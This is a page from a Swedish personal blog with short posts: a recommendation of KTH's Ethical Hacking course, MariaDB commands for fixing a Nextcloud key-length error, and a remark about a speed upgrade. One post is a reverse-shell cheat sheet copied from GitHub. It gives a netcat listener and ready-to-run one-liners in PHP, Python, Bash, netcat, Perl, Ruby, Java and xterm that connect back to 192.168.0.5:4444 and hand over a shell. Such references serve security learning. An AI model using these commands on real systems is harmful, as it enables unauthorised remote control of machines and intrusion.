Jörgens liv och leverne

Lite osammanhängade om Jörgen och hans liv...

Sida 2 av 118

Ethical Hacking

I samband med min kurs i Ethical Hacking fick jag frågan om jag vill berätta om den, nedan kan du se vad jag tyckte.

Jag kan varmt rekommendera KTH’s distanskurs i Ethical Hacking (7.5hp), mycket bra kurs om du har intresse och vill få en bra grund att bygga vidare på, eller om du bara vill veta mer så att du kan säkra upp ditt online-liv.

Här finns information om kursen: https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp

Länk till artikeln

https://www.kth.se/nse/studies/online-course-in-ethical-hacking-7-5-hp/students/to-win-over-the-hacks-you-have-to-think-like-the-hacker-1.824598

Och som PDF

To win over the hacks, you have to think like the hacker_ _ KTH

1071 Specified key was too long; max key length is 767 bytes

Har du fått felmeddelandet ” 1071 Specified key was too long; max key length is 767 bytes ” i din Nextcloud? Superenkelt att fixa!

$ sudo mysql -u root -p
MariaDB [(none)]> use nextcloud;
MariaDB [nextcloud]> set global innodb_large_prefix=on;
MariaDB [nextcloud]> set global innodb_file_format=Barracuda;
$ sudo -u www-data php occ maintenance:repair

Källa

Reverse shell

Börja med att skriva det här lokalt: nc -l -p 4444 -vvv

Och på remote sidan gör du någon av dessa

Php :

php -r '$sock=fsockopen("192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash :

bash -i >& /dev/tcp/192.168.0.5/4444 0>&1

Netcat :

nc -e /bin/sh 192.168.0.5 4444

Perl :

perl -e 'use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby :

ruby -rsocket -e'f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java :

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

xterm :

xterm -display 192.168.0.5:4444

Source https://github.com/ismailtasdelen/reverse-shell-cheatsheet

Mycket vill ha mer

Synd att det inte är symmetriskt.
Jag fick en gratis uppgradering från 150 -> 250 så jag är rätt nöjd ändå 😉

« Äldre inlägg Nyare inlägg »